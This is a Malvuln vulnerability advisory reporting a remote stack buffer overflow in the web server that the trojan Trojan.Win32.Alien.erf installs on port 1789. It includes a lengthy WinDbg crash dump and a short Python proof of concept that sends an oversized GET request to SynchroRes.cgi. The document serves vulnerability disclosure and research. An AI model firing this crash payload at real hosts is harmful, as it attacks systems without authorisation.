Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/57ab194d8c60ee97914eda22e4d71b68_B.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Trojan.Win32.Alien.erf
Vulnerability: Remote Stack Buffer Overflow
Description: The malware deploys a Web server AM6WebMgr.exe (JAO build 809) listening on TCP port 1789. Third-party attackers who can reach an infected host can trigger a classic remote buffer overflow by making a HTTP GET request for the "SynchroRes.cgi" URL with a long payload. This will overwrite the ECX and EIP stack registers.
Type: PE32
MD5: 57ab194d8c60ee97914eda22e4d71b68
Vuln ID: MVID-2021-0252
ASLR: False
DEP: True
Safe SEH: True
Disclosure: 06/16/2021
Memory Dump:
EAX : 00000000
EBX : 00000000
ECX : 41414141
EDX : 77279D70 ntdll.77279D70
EBP : 000A12E0
ESP : 000A12C0
ESI : 00000000
EDI : 00000000
EIP : 41414141
EFLAGS : 00010246
ZF : 1
OF : 0 am6webmgr.4FCF00
(1b74.1b40): Access violation - code c0000005 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=41414141 edx=77279d70 esi=00000000 edi=00000000
eip=41414141 esp=000a12c0 ebp=000a12e0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
41414141 ?? ???
0:000> .ecxr
eax=00000000 ebx=00000000 ecx=41414141 edx=77279d70 esi=00000000 edi=00000000
eip=41414141 esp=000a12c0 ebp=000a12e0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
41414141 ?? ???
0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** ERROR: Module load completed but symbols could not be loaded for AM6WebMgr.exe
*** ERROR: Symbol file could not be found. Defaulted to export symbols for JAONPServ.dll -
Failed calling InternetOpenUrl, GLE=12029
FAULTING_IP:
AM6WebMgr+3061e
0043061e f3a4 rep movs byte ptr es:[edi],byte ptr [esi]
EXCEPTION_RECORD: 0019eaf0 -- (.exr 0x19eaf0)
ExceptionAddress: 0043061e (AM6WebMgr+0x0003061e)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 001a0000
Attempt to write to address 001a0000
PROCESS_NAME: AM6WebMgr.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_PARAMETER1: 00000008
EXCEPTION_PARAMETER2: 41414141
WRITE_ADDRESS: 41414141
FOLLOWUP_IP:
AM6WebMgr+3061e
0043061e f3a4 rep movs byte ptr es:[edi],byte ptr [esi]
FAILED_INSTRUCTION_ADDRESS:
+3061e
41414141 ?? ???
MOD_LIST: <ANALYSIS/>
NTGLOBALFLAG: 0
APPLICATION_VERIFIER_FLAGS: 0
IP_ON_HEAP: 41414141
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.
IP_IN_FREE_BLOCK: 41414141
CONTEXT: 0019eb40 -- (.cxr 0x19eb40)
eax=04b116c7 ebx=000005e6 ecx=00000307 edx=000005e6 esi=04b113c0 edi=001a0000
eip=0043061e esp=0019efa0 ebp=0019efcc iopl=0 nv up ei pl nz na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010207
AM6WebMgr+0x3061e:
0043061e f3a4 rep movs byte ptr es:[edi],byte ptr [esi]
Resetting default scope
FAULTING_THREAD: ffffffff
BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141
PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141
DEFAULT_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141
LAST_CONTROL_TRANSFER: from 0044a12c to 0043061e
STACK_TEXT:
0019efa0 0043061e am6webmgr+0x3061e
0019efd4 0044a12c am6webmgr+0x4a12c
0019f008 004438b5 am6webmgr+0x438b5
0019f024 00440418 am6webmgr+0x40418
0019f4c8 0044aa27 am6webmgr+0x4aa27
0019f4ec 00401704 am6webmgr+0x1704
0019f510 00423195 am6webmgr+0x23195
0019f848 41414141 unknown!printable+0x0
0019f84c 41414141 unknown!printable+0x0
0019f850 41414141 unknown!printable+0x0
0019f854 41414141 unknown!printable+0x0
0019f858 41414141 unknown!printable+0x0
0019f85c 41414141 unknown!printable+0x0
0019f860 41414141 unknown!printable+0x0
0019f864 41414141 unknown!printable+0x0
0019f868 41414141 unknown!printable+0x0
0019f86c 41414141 unknown!printable+0x0
0019f870 41414141 unknown!printable+0x0
0019f874 41414141 unknown!printable+0x0
0019f878 41414141 unknown!printable+0x0
0019f87c 41414141 unknown!printable+0x0
0019f880 41414141 unknown!printable+0x0
0019f884 41414141 unknown!printable+0x0
0019f888 41414141 unknown!printable+0x0
0019f88c 41414141 unknown!printable+0x0
0019f890 41414141 unknown!printable+0x0
0019f894 41414141 unknown!printable+0x0
0019f898 41414141 unknown!printable+0x0
0019f89c 41414141 unknown!printable+0x0
0019f8a0 41414141 unknown!printable+0x0
0019f8a4 41414141 unknown!printable+0x0
0019f8a8 41414141 unknown!printable+0x0
0019f8ac 41414141 unknown!printable+0x0
0019f8b0 41414141 unknown!printable+0x0
0019f8b4 41414141 unknown!printable+0x0
0019f8b8 41414141 unknown!printable+0x0
0019f8bc 41414141 unknown!printable+0x0
0019f8c0 41414141 unknown!printable+0x0
0019f8c4 41414141 unknown!printable+0x0
0019f8c8 41414141 unknown!printable+0x0
0019f8cc 41414141 unknown!printable+0x0
0019f8d0 41414141 unknown!printable+0x0
0019f8d4 41414141 unknown!printable+0x0
0019f8d8 41414141 unknown!printable+0x0
0019f8dc 41414141 unknown!printable+0x0
0019f8e0 41414141 unknown!printable+0x0
0019f8e4 41414141 unknown!printable+0x0
0019f8e8 41414141 unknown!printable+0x0
0019f8ec 41414141 unknown!printable+0x0
0019f8f0 41414141 unknown!printable+0x0
0019f8f4 41414141 unknown!printable+0x0
0019f8f8 41414141 unknown!printable+0x0
0019f8fc 41414141 unknown!printable+0x0
0019f900 41414141 unknown!printable+0x0
0019f904 41414141 unknown!printable+0x0
0019f908 41414141 unknown!printable+0x0
0019f90c 41414141 unknown!printable+0x0
0019f910 41414141 unknown!printable+0x0
0019f914 41414141 unknown!printable+0x0
0019f918 41414141 unknown!printable+0x0
0019f91c 41414141 unknown!printable+0x0
0019f920 41414141 unknown!printable+0x0
0019f924 41414141 unknown!printable+0x0
0019f928 41414141 unknown!printable+0x0
0019f92c 41414141 unknown!printable+0x0
0019f930 41414141 unknown!printable+0x0
0019f934 41414141 unknown!printable+0x0
0019f938 41414141 unknown!printable+0x0
0019f93c 41414141 unknown!printable+0x0
0019f940 41414141 unknown!printable+0x0
0019f944 41414141 unknown!printable+0x0
0019f948 41414141 unknown!printable+0x0
0019f94c 41414141 unknown!printable+0x0
0019f950 41414141 unknown!printable+0x0
0019f954 41414141 unknown!printable+0x0
0019f958 41414141 unknown!printable+0x0
0019f95c 41414141 unknown!printable+0x0
0019f960 41414141 unknown!printable+0x0
0019f964 41414141 unknown!printable+0x0
0019f968 41414141 unknown!printable+0x0
0019f96c 41414141 unknown!printable+0x0
0019f970 41414141 unknown!printable+0x0
0019f974 41414141 unknown!printable+0x0
0019f978 41414141 unknown!printable+0x0
0019f97c 41414141 unknown!printable+0x0
0019f980 41414141 unknown!printable+0x0
0019f984 41414141 unknown!printable+0x0
0019f988 41414141 unknown!printable+0x0
0019f98c 41414141 unknown!printable+0x0
0019f990 41414141 unknown!printable+0x0
0019f994 41414141 unknown!printable+0x0
0019f998 41414141 unknown!printable+0x0
0019f99c 41414141 unknown!printable+0x0
0019f9a0 41414141 unknown!printable+0x0
0019f9a4 41414141 unknown!printable+0x0
0019f9a8 41414141 unknown!printable+0x0
0019f9ac 41414141 unknown!printable+0x0
0019f9b0 41414141 unknown!printable+0x0
0019f9b4 41414141 unknown!printable+0x0
0019f9b8 41414141 unknown!printable+0x0
0019f9bc 41414141 unknown!printable+0x0
0019f9c0 41414141 unknown!printable+0x0
0019f9c4 41414141 unknown!printable+0x0
0019f9c8 41414141 unknown!printable+0x0
0019f9cc 41414141 unknown!printable+0x0
0019f9d0 41414141 unknown!printable+0x0
0019f9d4 41414141 unknown!printable+0x0
0019f9d8 41414141 unknown!printable+0x0
0019f9dc 41414141 unknown!printable+0x0
0019f9e0 41414141 unknown!printable+0x0
0019f9e4 41414141 unknown!printable+0x0
0019f9e8 41414141 unknown!printable+0x0
0019f9ec 41414141 unknown!printable+0x0
0019f9f0 41414141 unknown!printable+0x0
0019f9f4 41414141 unknown!printable+0x0
0019f9f8 41414141 unknown!printable+0x0
0019f9fc 41414141 unknown!printable+0x0
0019fa00 41414141 unknown!printable+0x0
0019fa04 41414141 unknown!printable+0x0
0019fa08 41414141 unknown!printable+0x0
0019fa0c 41414141 unknown!printable+0x0
0019fa10 41414141 unknown!printable+0x0
0019fa14 41414141 unknown!printable+0x0
0019fa18 41414141 unknown!printable+0x0
0019fa1c 41414141 unknown!printable+0x0
0019fa20 41414141 unknown!printable+0x0
0019fa24 41414141 unknown!printable+0x0
0019fa28 41414141 unknown!printable+0x0
0019fa2c 41414141 unknown!printable+0x0
0019fa30 41414141 unknown!printable+0x0
0019fa34 41414141 unknown!printable+0x0
0019fa38 41414141 unknown!printable+0x0
0019fa3c 41414141 unknown!printable+0x0
0019fa40 41414141 unknown!printable+0x0
0019fa44 41414141 unknown!printable+0x0
0019fa48 41414141 unknown!printable+0x0
0019fa4c 41414141 unknown!printable+0x0
0019fa50 41414141 unknown!printable+0x0
0019fa54 41414141 unknown!printable+0x0
0019fa58 41414141 unknown!printable+0x0
0019fa5c 41414141 unknown!printable+0x0
0019fa60 41414141 unknown!printable+0x0
0019fa64 41414141 unknown!printable+0x0
0019fa68 41414141 unknown!printable+0x0
0019fa6c 41414141 unknown!printable+0x0
0019fa70 41414141 unknown!printable+0x0
0019fa74 41414141 unknown!printable+0x0
0019fa78 41414141 unknown!printable+0x0
0019fa7c 41414141 unknown!printable+0x0
0019fa80 41414141 unknown!printable+0x0
0019fa84 41414141 unknown!printable+0x0
0019fa88 41414141 unknown!printable+0x0
0019fa8c 41414141 unknown!printable+0x0
0019fa90 41414141 unknown!printable+0x0
0019fa94 41414141 unknown!printable+0x0
0019fa98 41414141 unknown!printable+0x0
0019fa9c 41414141 unknown!printable+0x0
0019faa0 41414141 unknown!printable+0x0
0019faa4 41414141 unknown!printable+0x0
0019faa8 41414141 unknown!printable+0x0
0019faac 41414141 unknown!printable+0x0
0019fab0 41414141 unknown!printable+0x0
0019fab4 41414141 unknown!printable+0x0
0019fab8 41414141 unknown!printable+0x0
0019fabc 41414141 unknown!printable+0x0
0019fac0 41414141 unknown!printable+0x0
0019fac4 41414141 unknown!printable+0x0
0019fac8 41414141 unknown!printable+0x0
0019facc 41414141 unknown!printable+0x0
0019fad0 41414141 unknown!printable+0x0
0019fad4 41414141 unknown!printable+0x0
0019fad8 41414141 unknown!printable+0x0
0019fadc 41414141 unknown!printable+0x0
0019fae0 41414141 unknown!printable+0x0
0019fae4 41414141 unknown!printable+0x0
0019fae8 41414141 unknown!printable+0x0
0019faec 41414141 unknown!printable+0x0
0019faf0 41414141 unknown!printable+0x0
0019faf4 41414141 unknown!printable+0x0
0019faf8 41414141 unknown!printable+0x0
0019fafc 41414141 unknown!printable+0x0
0019fb00 41414141 unknown!printable+0x0
0019fb04 41414141 unknown!printable+0x0
0019fb08 41414141 unknown!printable+0x0
0019fb0c 41414141 unknown!printable+0x0
0019fb10 41414141 unknown!printable+0x0
0019fb14 41414141 unknown!printable+0x0
0019fb18 41414141 unknown!printable+0x0
0019fb1c 41414141 unknown!printable+0x0
0019fb20 41414141 unknown!printable+0x0
0019fb24 41414141 unknown!printable+0x0
0019fb28 41414141 unknown!printable+0x0
0019fb2c 41414141 unknown!printable+0x0
0019fb30 41414141 unknown!printable+0x0
0019fb34 41414141 unknown!printable+0x0
0019fb38 41414141 unknown!printable+0x0
0019fb3c 41414141 unknown!printable+0x0
0019fb40 41414141 unknown!printable+0x0
0019fb44 41414141 unknown!printable+0x0
0019fb48 41414141 unknown!printable+0x0
0019fb4c 41414141 unknown!printable+0x0
0019fb50 41414141 unknown!printable+0x0
0019fb54 41414141 unknown!printable+0x0
0019fb58 41414141 unknown!printable+0x0
0019fb5c 41414141 unknown!printable+0x0
0019fb60 41414141 unknown!printable+0x0
0019fb64 41414141 unknown!printable+0x0
0019fb68 41414141 unknown!printable+0x0
0019fb6c 41414141 unknown!printable+0x0
0019fb70 41414141 unknown!printable+0x0
0019fb74 41414141 unknown!printable+0x0
0019fb78 41414141 unknown!printable+0x0
0019fb7c 41414141 unknown!printable+0x0
0019fb80 41414141 unknown!printable+0x0
0019fb84 41414141 unknown!printable+0x0
0019fb88 41414141 unknown!printable+0x0
0019fb8c 41414141 unknown!printable+0x0
0019fb90 41414141 unknown!printable+0x0
0019fb94 41414141 unknown!printable+0x0
0019fb98 41414141 unknown!printable+0x0
0019fb9c 41414141 unknown!printable+0x0
0019fba0 41414141 unknown!printable+0x0
0019fba4 41414141 unknown!printable+0x0
0019fba8 41414141 unknown!printable+0x0
0019fbac 41414141 unknown!printable+0x0
0019fbb0 41414141 unknown!printable+0x0
0019fbb4 41414141 unknown!printable+0x0
0019fbb8 41414141 unknown!printable+0x0
0019fbbc 41414141 unknown!printable+0x0
0019fbc0 41414141 unknown!printable+0x0
0019fbc4 41414141 unknown!printable+0x0
0019fbc8 41414141 unknown!printable+0x0
0019fbcc 41414141 unknown!printable+0x0
0019fbd0 41414141 unknown!printable+0x0
0019fbd4 41414141 unknown!printable+0x0
0019fbd8 41414141 unknown!printable+0x0
0019fbdc 41414141 unknown!printable+0x0
0019fbe0 41414141 unknown!printable+0x0
0019fbe4 41414141 unknown!printable+0x0
0019fbe8 41414141 unknown!printable+0x0
0019fbec 41414141 unknown!printable+0x0
0019fbf0 41414141 unknown!printable+0x0
0019fbf4 41414141 unknown!printable+0x0
0019fbf8 41414141 unknown!printable+0x0
0019fbfc 41414141 unknown!printable+0x0
0019fc00 41414141 unknown!printable+0x0
0019fc04 41414141 unknown!printable+0x0
0019fc08 41414141 unknown!printable+0x0
0019fc0c 41414141 unknown!printable+0x0
0019fc10 41414141 unknown!printable+0x0
0019fc14 41414141 unknown!printable+0x0
0019fc18 41414141 unknown!printable+0x0
0019fc1c 41414141 unknown!printable+0x0
0019fc20 41414141 unknown!printable+0x0
0019fc24 41414141 unknown!printable+0x0
0019fc28 41414141 unknown!printable+0x0
0019fc2c 41414141 unknown!printable+0x0
0019fc30 41414141 unknown!printable+0x0
0019fc34 41414141 unknown!printable+0x0
0019fc38 41414141 unknown!printable+0x0
0019fc3c 41414141 unknown!printable+0x0
0019fc40 41414141 unknown!printable+0x0
0019fc44 41414141 unknown!printable+0x0
0019fc48 41414141 unknown!printable+0x0
0019fc4c 41414141 unknown!printable+0x0
0019fc50 41414141 unknown!printable+0x0
0019fc54 41414141 unknown!printable+0x0
0019fc58 41414141 unknown!printable+0x0
0019fc5c 41414141 unknown!printable+0x0
0019fc60 41414141 unknown!printable+0x0
0019fc64 41414141 unknown!printable+0x0
0019fc68 41414141 unknown!printable+0x0
0019fc6c 41414141 unknown!printable+0x0
0019fc70 41414141 unknown!printable+0x0
0019fc74 41414141 unknown!printable+0x0
0019fc78 41414141 unknown!printable+0x0
0019fc7c 41414141 unknown!printable+0x0
0019fc80 41414141 unknown!printable+0x0
0019fc84 41414141 unknown!printable+0x0
0019fc88 41414141 unknown!printable+0x0
0019fc8c 41414141 unknown!printable+0x0
0019fc90 41414141 unknown!printable+0x0
0019fc94 41414141 unknown!printable+0x0
0019fc98 41414141 unknown!printable+0x0
0019fc9c 41414141 unknown!printable+0x0
0019fca0 41414141 unknown!printable+0x0
0019fca4 41414141 unknown!printable+0x0
0019fca8 41414141 unknown!printable+0x0
0019fcac 41414141 unknown!printable+0x0
0019fcb0 41414141 unknown!printable+0x0
0019fcb4 41414141 unknown!printable+0x0
0019fcb8 41414141 unknown!printable+0x0
0019fcbc 41414141 unknown!printable+0x0
0019fcc0 41414141 unknown!printable+0x0
0019fcc4 41414141 unknown!printable+0x0
0019fcc8 41414141 unknown!printable+0x0
0019fccc 41414141 unknown!printable+0x0
0019fcd0 41414141 unknown!printable+0x0
0019fcd4 41414141 unknown!printable+0x0
0019fcd8 41414141 unknown!printable+0x0
0019fcdc 41414141 unknown!printable+0x0
0019fce0 41414141 unknown!printable+0x0
0019fce4 41414141 unknown!printable+0x0
0019fce8 41414141 unknown!printable+0x0
0019fcec 41414141 unknown!printable+0x0
0019fcf0 41414141 unknown!printable+0x0
0019fcf4 41414141 unknown!printable+0x0
0019fcf8 41414141 unknown!p
STACK_COMMAND: .cxr 000000000019EB40 ; kb ; dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; dds 19efa0 ; kb
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: am6webmgr+3061e
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: AM6WebMgr
IMAGE_NAME: AM6WebMgr.exe
DEBUG_FLR_IMAGE_TIMESTAMP: 5c000237
FAILURE_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_AM6WebMgr.exe!Unknown
BUCKET_ID: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_am6webmgr+3061e
Exploit/PoC:
from socket import *
MALWARE_HOST="x.x.x.x"
PORT=1789
def doit():
s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))
PAYLOAD="GET /SynchroRes.cgi?A=L^&Src="+"A"*1510+ " HTTP/1.0\r\nHost: "+MALWARE_HOST+"\r\n\r\n"
s.send(PAYLOAD)
print("Trojan.Win32.Alien.erf / Remote Stack Buffer Overflow")
print("MD5: 57ab194d8c60ee97914eda22e4d71b68")
print("By Malvuln")
if __name__=="__main__":
doit()
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).